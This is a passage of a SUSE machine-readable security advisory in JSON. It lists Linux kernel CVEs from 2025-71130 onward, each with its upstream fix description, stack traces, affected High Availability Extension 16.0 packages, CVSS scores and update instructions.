"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 [irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
